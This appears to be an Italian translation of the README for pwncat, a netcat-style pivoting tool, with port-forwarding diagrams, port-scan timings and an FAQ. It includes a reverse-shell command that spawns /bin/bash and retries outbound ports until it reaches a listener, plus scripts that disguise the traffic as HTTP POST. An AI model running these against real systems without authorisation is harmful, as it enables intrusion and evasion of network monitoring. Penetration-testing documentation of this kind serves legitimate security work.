INFO: [bind-sock] IPv4: IP_TTL: 64
INFO: [bind-sock] IPv4: IP_RECVOPTS: 0
INFO: [bind-sock] IPv4: IP_RECVRETOPTS: 0
INFO: [bind-sock] IPv4: IP_RETOPTS: 0
INFO: [bind-sock] IPv4: IP_MULTICAST_IF: 0
INFO: [bind-sock] IPv4: IP_MULTICAST_TTL: 1
INFO: [bind-sock] IPv4: IP_MULTICAST_LOOP: 1
INFO: [bind-sock] IPv4: IP_DEFAULT_MULTICAST_TTL: 0
INFO: [bind-sock] IPv4: IP_DEFAULT_MULTICAST_LOOP: 0
INFO: [bind-sock] IPv4: IP_MAX_MEMBERSHIPS: 0
INFO: [bind-sock] IPv4: IP_TRANSPARENT: 0
INFO: [bind-sock] TCP: TCP_NODELAY: 0
INFO: [bind-sock] TCP: TCP_MAXSEG: 536
INFO: [bind-sock] TCP: TCP_CORK: 0
INFO: [bind-sock] TCP: TCP_KEEPIDLE: 7200
INFO: [bind-sock] TCP: TCP_KEEPINTVL: 75
INFO: [bind-sock] TCP: TCP_KEEPCNT: 9
INFO: [bind-sock] TCP: TCP_SYNCNT: 6
INFO: [bind-sock] TCP: TCP_LINGER2: 60
INFO: [bind-sock] TCP: TCP_DEFER_ACCEPT: 0
INFO: [bind-sock] TCP: TCP_WINDOW_CLAMP: 0
INFO: [bind-sock] TCP: TCP_INFO: 10
INFO: [bind-sock] TCP: TCP_QUICKACK: 1
INFO: [bind-sock] TCP: TCP_FASTOPEN: 0
Scenario
#### Inoltro locale di porta UDP
**Scenario**
1. Alice può essere raggiunta dall'esterno (ma solo tramite UDP)
2. Bob può essere raggiunto solo dalla macchina di Alice```
| |
Outside | DMZ | private subnet
| |
| |
+-----------------+ UDP +-----------------+ TCP +-----------------+
| The cat | -----|----> | Alice | -----|----> | Bob |
| | | | pwncat -L | | | MySQL |
| 56.0.0.1 | | | 72.0.0.1:3306 | | | 10.0.0.1:3306 |
+-----------------+ | +-----------------+ | +-----------------+
pwncat -u 72.0.0.1 3306 | pwncat -u \ |
| -L 72.0.0.1:3306 \ |
| 10.0.0.1 3306 |
Scenario
#### Inoltro remoto di porta UDP
**Scenario**
1. Alice non può essere raggiunta dall'esterno
2. Alice può connettersi all'esterno (UDP: solo DNS)
3. Bob può essere raggiunto solo dalla macchina di Alice```
| |
Outside | DMZ | private subnet
| |
| |
+-----------------+ UDP +-----------------+ TCP +-----------------+
| The cat | <----|----- | Alice | -----|----> | Bob |
| | | | pwncat | | | MySQL |
| 56.0.0.1 | | | 72.0.0.1:3306 | | | 10.0.0.1:3306 |
+-----------------+ | +-----------------+ | +-----------------+
pwncat -u -l 53 | pwncat -u --reconn \ |
| -R 56.0.0.1:4444 \ |
| 10.0.0.1 3306 |
Se non hai idea di quali porte in uscita siano consentite dalla macchina di destinazione, puoi istruire il client (ad es.: in caso di reverse shell) a eseguire la scansione delle porte in uscita all'infinito.```bash
pwncat --exec /bin/bash --reconn --reconn-wait 0.1 --reconn-robin 54-1024 10 10.0.0.1 53
Una volta che il client è attivo e funzionante, utilizza socket raw per verificare il traffico in entrata oppure usa
qualcosa come Wireshark o tcpdump per scoprire da dove il client è in grado di riconnettersi a te,
Se hai trovato una o più porte a cui il client è in grado di connettersi a te,
avvia semplicemente il tuo listener in locale e attendi che ritorni.```bash
pwncat -l <ip> <port>
Se il client si connette a te, avrai una reverse shell funzionante. Se interrompi il tuo server di ascolto locale accidentalmente o intenzionalmente, il client sonderà di nuovo le porte fino a quando non si connette con successo.
Per uccidere il client della reverse shell, puoi usare --safe-word (all'avvio del client).
Se nulla di tutto ciò funziona, puoi aggiungere altre misure come l'uso di UDP o persino il wrapping dei tuoi pacchetti in protocolli di livello superiore, come HTTP o altri. Vedi PSE o gli esempi sotto per come trasformare il tuo traffico.
pwncat offre un motore di scripting basato su Python per iniettare il tuo codice personalizzato prima di inviare e
dopo aver ricevuto dati.
Dovrai semplicemente fornire un file Python con la seguente funzione di entrypoint:```python def transform(data, pse): # Example to reverse a string return data[::-1]
Entrambi, il nome della funzione deve essere `transform` e gli argomenti parsati devono essere chiamati `data` e `pse`.
Per il resto puoi aggiungere tutto il codice che vuoi. Ogni istanza di `pwncat` può accettare due script:
1. `--script-send`: lo script verrà applicato prima dell'invio
2. `--script-recv`: lo script verrà applicato dopo la ricezione
Vedi [qui](https://github.com/cytopia/pwncat/blob/HEAD/pse) per l'API e maggiori dettagli
#### Esempio 1: Crittografia asimmetrica auto-costruita
> PSE: [asym-enc](https://github.com/cytopia/pwncat/blob/HEAD/pse/asym-enc) codice sorgente
Questo crittograferà il tuo traffico in modo asimmetrico. È solo una implementazione molto basilare di [ROT13](https://en.wikipedia.org/wiki/ROT13) con diversi spostamenti di lunghezza su entrambi i lati per *emulare* l'asimmetria. Potresti fare lo stesso e implementare la crittografia asimmetrica basata su GPG per PSE.```bash
# server
pwncat -vvvv -l localhost 4444 \
--script-send pse/asym-enc/pse-asym_enc-server_send.py \
--script-recv pse/asym-enc/pse-asym_enc-server_recv.py
# client
pwncat -vvvv localhost 4444 \
--script-send pse/asym-enc/pse-asym_enc-client_send.py \
--script-recv pse/asym-enc/pse-asym_enc-client_recv.py
PSE: http-post codice sorgente
Questo incapsulerà tutto il traffico in una richiesta HTTP POST valida, facendolo apparire come normale traffico HTTP.```bash
pwncat -vvvv -l localhost 4444
--script-send pse/http-post/pse-http_post-pack.py
--script-recv pse/http-post/pse-http_post-unpack.py
```bash
# client
pwncat -vvvv localhost 4444 \
--script-send pse/http-post/pse-http_post-pack.py \
--script-recv pse/http-post/pse-http_post-unpack.py
$ sudo netstat -tlpn Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:4444 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:902 0.0.0.0:* LISTEN tcp6 0 0 ::1:631 :::* LISTEN tcp6 0 0 ::1:25 :::* LISTEN tcp6 0 0 ::1:4444 :::* LISTEN tcp6 0 0 :::1053 :::* LISTEN tcp6 0 0 :::902 :::* LISTEN
#### UDP
Le seguenti porte UDP sono esposte:```bash
$ sudo netstat -ulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address
udp 0 0 0.0.0.0:631 0.0.0.0:*
udp 0 0 0.0.0.0:5353 0.0.0.0:*
udp 0 0 0.0.0.0:39856 0.0.0.0:*
udp 0 0 0.0.0.0:68 0.0.0.0:*
udp 0 0 0.0.0.0:68 0.0.0.0:*
udp6 0 0 :::1053 :::*
udp6 0 0 :::5353 :::*
udp6 0 0 :::57728 :::*
$ time sudo nmap -T5 localhost --version-intensity 0 -p- -sU Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-24 17:03 CEST Warning: 127.0.0.1 giving up on port because retransmission cap hit (2). Nmap scan report for localhost (127.0.0.1) Host is up (0.000035s latency). Other addresses for localhost (not scanned): ::1 Not shown: 65529 closed ports PORT STATE SERVICE 68/udp open|filtered dhcpc 631/udp open|filtered ipp 1053/udp open|filtered remote-as 5353/udp open|filtered zeroconf 39856/udp open|filtered unknown 40488/udp open|filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 179.15 seconds
real 2m52.446s user 0m0.844s sys 0m2.571s
##### netcat```bash
$ time nc -z localhost 1-65535 -u -4 -v
Connection to localhost 68 port [udp/bootpc] succeeded!
Connection to localhost 631 port [udp/ipp] succeeded!
Connection to localhost 1053 port [udp/*] succeeded!
Connection to localhost 5353 port [udp/mdns] succeeded!
Connection to localhost 39856 port [udp/*] succeeded!
real 0m18.734s
user 0m1.004s
sys 0m2.634s
$ time pwncat -z localhost 1-65535 -u -4 Scanning 65535 ports [+] 68/UDP open (IPv4) [+] 631/UDP open (IPv4) [+] 1053/UDP open (IPv4) [+] 5353/UDP open (IPv4) [+] 39856/UDP open (IPv4)
real 0m7.309s user 0m6.465s sys 0m4.794s
## :information_source: FAQ
**Vedi le FAQ complete qui:** https://docs.pwncat.org/en/latest/faq.html
**D**: `pwncat` è compatibile con `netcat`?
**R**: Sì, è completamente compatibile nel modo in cui si comporta in modalità connessione, ascolto e zero-i/o.
Puoi persino miscelare `pwncat` con `netcat`, `ncat` o strumenti simili.
**D**: Funziona su X?
**R**: Nello stato attuale funziona con Python 2, 3, pypy2 e pypy3 ed è completamente testato su Linux e MacOS. Il supporto per Windows è disponibile, ma è considerato sperimentale (vedi [test di integrazione](https://github.com/cytopia/pwncat/actions)).
**D**: Ho trovato un bug / Ho un suggerimento per una nuova funzionalità! Cosa posso fare?
**R**: Per segnalazioni di bug o miglioramenti, apri un issue [qui](https://github.com/cytopia/pwncat/issues).
**D**: Come posso supportare questo progetto?
**R**: Grazie per averlo chiesto! Prima di tutto, metti una stella a questo progetto per darmi un feedback e consulta [CONTRIBUTING.md](https://github.com/cytopia/pwncat/blob/HEAD/CONTRIBUTING.md) per i dettagli.
## :sunrise: Opera d'arte
<table>
<thead>
<tr>
<th>Tipo</th>
<th>Artista</th>
<th>Immagine</th>
<th>Licenza</th>
</tr>
</thead>
<tbody>
<tr>
<td>Logo</td>
<td><a href="https://github.com/maifz">maifz</a></td>
<td><a href="art/logo.png"><img src="https://assets.kitploit.com/production/public/readmes/5318/a1b54927c2019b933f6e456079c612aff45d525e69c6058199d8fe049916146f.png" style="height:128px;" height="128" alt="logo pwncat" title="logo pwncat" /></a></td>
<td><a href="https://creativecommons.org/licenses/by-sa/4.0/"><img src="https://assets.kitploit.com/production/public/readmes/5318/acde67df4b37d9df101d6555c669c258cea69750bc84ae2051ebec0970f706c8.png" /></a></td>
</tr>
<tr>
<td>Banner 1</td>
<td><a href="https://github.com/maifz">maifz</a></td>
<td><a href="art/banner-1.png"><img src="https://assets.kitploit.com/production/public/readmes/5318/51461eddf94bb0ed53b8d28478113978cf87ea31e645b2afc8e1783053e8bafc.png" style="height:128px;" height="128" alt="banner pwncat" title="banner pwncat" /></a></td>
<td><a href="https://creativecommons.org/licenses/by-sa/4.0/"><img src="https://assets.kitploit.com/production/public/readmes/5318/acde67df4b37d9df101d6555c669c258cea69750bc84ae2051ebec0970f706c8.png" /></a></td>
</tr>
<tr>
<td>Banner 2</td>
<td><a href="https://github.com/maifz">maifz</a></td>
<td><a href="art/banner-2.png"><img src="https://assets.kitploit.com/production/public/readmes/5318/1deb2e118b970b2b974f682e9ef087bbc5cc9c18674b5d4cbbdf967885d119c9.png" style="height:128px;" height="128" alt="banner pwncat" title="banner pwncat" /></a></td>
<td><a href="https://creativecommons.org/licenses/by-sa/4.0/"><img src="https://assets.kitploit.com/production/public/readmes/5318/acde67df4b37d9df101d6555c669c258cea69750bc84ae2051ebec0970f706c8.png" /></a></td>
</tr>
</tbody>
</table>
## :lock: [cytopia](https://github.com/cytopia) strumenti di sicurezza
Di seguito un elenco di strumenti di sicurezza e documentazione che mantengo.
| Nome | Categoria | Linguaggio | Descrizione |
|---------------------|-----------------------|--------------|-------------|
| **[offsec]** | Documentazione | Markdown | Checklist, strumenti ed esempi per offsec |
| **[header-fuzz]** | Enumerazione | Bash | Fuzz degli header HTTP |
| **[smtp-user-enum]**| Enumerazione | Python 2+3 | Enumeratore utenti SMTP |
| **[urlbuster]** | Enumerazione | Python 2+3 | Fuzz di directory web mutabile |
| **[pwncat]** | Pivoting | Python 2+3 | Netcat multipiattaforma potenziato |
| **[kusanagi]** | Generatore payload | Python 3 | Generatore di payload per shell bind e reverse |
| **[badchars]** | Reverse Engineering | Python 2+3 | Generatore di caratteri cattivi |
| **[fuzza]** | Reverse Engineering | Python 2+3 | Strumento di fuzzing TCP |
| **[docker-dvwa]** | Playground | PHP | DVWA con sfide di privilege escalation locale |
[offsec]: https://github.com/cytopia/offsec
[header-fuzz]: https://github.com/cytopia/header-fuzz
[smtp-user-enum]: https://github.com/cytopia/smtp-user-enum
[urlbuster]: https://github.com/cytopia/urlbuster
[pwncat]: https://github.com/cytopia/pwncat
[kusanagi]: https://github.com/cytopia/kusanagi
[badchars]: https://github.com/cytopia/badchars
[fuzza]: https://github.com/cytopia/fuzza
[docker-dvwa]: https://github.com/cytopia/docker-dvwa
## :octocat: Contribuire
Vedi le **[Linee guida per contribuire](https://github.com/cytopia/pwncat/blob/HEAD/CONTRIBUTING.md)** per aiutare a migliorare questo progetto.
## :exclamation: Dichiarazione di non responsabilità
Questo strumento può essere utilizzato solo per scopi legali. Gli utenti si assumono la piena responsabilità per qualsiasi azione eseguita con questo strumento. L'autore non accetta alcuna responsabilità per danni causati da questo strumento. Se questi termini non sono accettabili, non utilizzare questo strumento.
## :page_facing_up: Licenza
**[Licenza MIT](https://github.com/cytopia/pwncat/blob/HEAD/LICENSE.txt)**
Copyright (c) 2020 **[cytopia](https://github.com/cytopia)**